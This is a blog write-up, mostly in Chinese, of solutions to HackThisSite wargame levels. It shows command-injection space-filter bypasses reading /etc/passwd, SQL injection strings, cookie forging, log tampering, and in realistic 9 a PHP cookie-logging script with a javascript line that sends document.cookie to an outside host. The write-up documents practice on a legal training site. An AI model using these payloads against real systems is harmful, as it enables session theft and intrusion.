hackthissite

date
Aug 9, 2021 07:17 AM
Related to 日程数据 1 (blog)
tags
Writeup
Website
slug
hackthissite
summary
hackthissite

Level 1(the idiot test)

notion image

Level 2

没有上传密码文件,那就是没密码

Level 3

notion image
notion image
貌似可以全程开F12

Level 4

notion image
直接修改value为自己的邮箱
notion image

level 5

继续改邮箱

level 6

notion image
结果是
Your encrypted string is: 'abcdefgh'
嗯,分别加一位?
再来一次33333333
Your encrypted string is: '3456789:'
算一算:
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
enc=['3',':','8','g',';','=','i','9']
ps = 0
for i in enc:
    ps = ord(i) - enc.index(i)
    print(chr(ps))
396d78c2

level 7

notion image
命令!没过滤?
notion image
cat 一下奇怪的文件
notion image
哈哈 有空格过滤,不过
在一些漏洞利用场景,或者因为waf等原因,导致无法使用空格时,可以试试如下命令: IFS=,;cat<<<cat,/etc/passwd cat$IFS/etc/passwd cat${IFS}/etc/passwd cat</etc/passwd {cat,/etc/passwd} X=$'cat\x20/etc/passwd'&&$X
算了,不给偏门走

level 8

小女儿可还行!!
notion image
换个名字再找找规律
notion image
继续
notion image
notion image
notion image
what fk
php?
notion image
notion image
没有 那pwd
notion image
嗯 ls ..
notion image
有了
没注意到url里多了个tmp

level 9

notion image
notion image
这脑回路清奇
用level8的框解level9的题
notion image

level 10

notion image
连提示都没了
notion image
javascript?
notion image
cookie够不够隐蔽

level 11

notion image
放弃……
 
 

realistic 1

notion image
一个点赞网页 刷分 点👍时会抓到一个get请求
notion image
so 你想要几分 vote=99999999999?

realistic 2

notion image
源码里发现一个网页
notion image
随便登登,又没字典
notion image
notion image
notion image
成功!

realistic 3

看源码,拉到底
notion image
找到旧的文件
有诗集更新入口
上传oldindex源码为index

realistic 4

notion image
products.php?category=1 2 可以返回不同的结果 查询?sql?
notion image
 
 
 
 
 
改2为*
notion image
 
发信息给他————》
点左边自己的名字再点中间自己的名字
即可发送消息
后面需要发message的题都用的上
notion image
成功
notion image
notion image
order by 5 就出错了
找回显位union all select 1,2,3,4
UNION ALL 命令和 UNION 命令几乎是等效的,不过 UNION ALL 命令会列出所有的值。
notion image
下一步 怎么提交答案,返回去看题目
notion image
notion image
 

realistic 5

notion image
notion image
hash 10 year
网页内源码翻到这个
notion image
尝试看目录,有备份文件bak
notion image
拿到题目提到的hash
notion image
解密去
notion image
结束
notion image

realistic 6

是个解密的
notion image
notion image
是个加密工具
notion image
需要测试出加密算法
嗯 没办法 测吧
测不出来
下一题
 

realistic 7

notion image
notion image
file= 文件包含
文件名信息呢?
notion image
notion image
notion image
一路打开看下去
notion image
测试一下账号密码
应该需要破解
notion image
再试一试。
下一个

realistic 8

notion image
可能是从日志入手吧
notion image
有注册 有登录 有查询
试试看吧
notion image
前面为用户名:后面为描述
notion image
回到查询界面尝试注入1' or 1
notion image
找到目标人物
notion image
Select * from users where username like Gary Hunter"
notion image
notion image
notion image
GaryWilliamHunter 
 -- $$$$$ --
伪造cookie
notion image
cookie使用他的用户名 网页操作转账
notion image
notion image
转账成功
还需要清理日志
notion image
修改一下
notion image
 

realistic 9

notion image
 
Username: r-conner@crappysoft.com
Password: ilovemywork
notion image
notion image
<?php
$ua = $_SERVER["HTTP_USER_AGENT"];
$client_ip = $_SERVER["REMOTE_ADDR"];
$method = $_SERVER["REQUEST_METHOD"];
$referer = $_SERVER["HTTP_REFERER"];
$date = date("F j, Y, g:i a");
$querystring = $_SERVER["QUERY_STRING"];
$log = fopen("cookie.txt","a+");
$str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date  | Cookie: $querystring \n";
fwrite($log,$str);
?>
javascript:void(window.location='https://bear4.ml/edl/trojan/stealcookies.php?'+document.cookie);
notion image
拿到管理员的cookies 就可以伪造了
再去pay一下
It's beyond the scope of this mission to check the XSS. So, assume you got this cookie:
strUsername=m-crap%40crappysoft.com; strPassword=94a35a3b7befff5eb2a8415af04aa16c; intID=1;
 
notion image
成功获得权限
pay
notion image
前面mailing有delete函数
notion image
notion image
继续找
notion image
想办法删除
notion image

notion image
notion image
 

realistic 10

notion image
my account is 'Zach Sanchez' and my password is 'liberty638'
notion image
notion image
 
notion image
有student及staff 两个登录口
试试先
notion image
notion image
 
 
 
notion image
试试弱密码
就找阿尔法阶段的第一个用户
notion image
done
 
but
notion image
easy
notion image
头号玩家并不是administartor
notion image
cookies里又有好东西 admin=1/0???
notion image
hackbar不能持续修改 UA
或许需要其他工具
notion image
修改get及post请求即可完成数据修改
notion image
notion image
1改5试试
notion image
notion image
notion image
成功 没有post 评论 所以comments被清空了
继续改分
notion image
还是gym即rec=3
notion image

realistic 11

notion image
space46
src.tar.gz
notion image
notion image
啥也没有啊
notion image
notion image
sqli? 没有
page= ??? 命令执行
|ls|
notion image
admin bs.dbase client_http_docs frontpage.gif index.html index.pl 
letter.gif logo.gif ms.gif mysql.gif order.pl page.pl pages perl.gif php.gif 
server.gif sqlite.png suspended.html tux.gif webmail.php
 
 
 
 
 
 
 
 
 
 
 

Application 2

notion image
notion image
和1的明文sn不一样不一样
2这里没有
可能有算法之类的
notion image
它会去远程服务器请求sn进行对比
notion image
 
 

Application 3

notion image
 
notion image
 

© lewoking 2021 - 2022